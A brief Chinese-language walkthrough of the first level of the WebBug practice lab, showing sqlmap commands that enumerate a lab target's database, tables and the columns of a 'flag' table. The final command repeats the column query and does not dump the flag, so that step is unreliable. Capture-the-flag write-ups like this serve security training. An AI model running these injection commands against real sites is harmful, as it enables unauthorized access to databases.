Webbug靶场第一关
大家好,我是sean,今天给大家带来的是webbug的靶场第一关。
靶场环境:2003 phptudy
用到的打靶工具:sqlmap
首先打开靶场
用sqlmap来注入获取下数据库名
root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" --current-db
查到数据库名称是pentesterlab,接下来在获取数据库的表名
root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --table
当看到flag那就基本确定就是他了,接下来在看下这个表的字段
root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns
看到两个字段的内容,然后直接爆flag
root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns
第一次搞,没什么经验,自己折腾吧。
congtou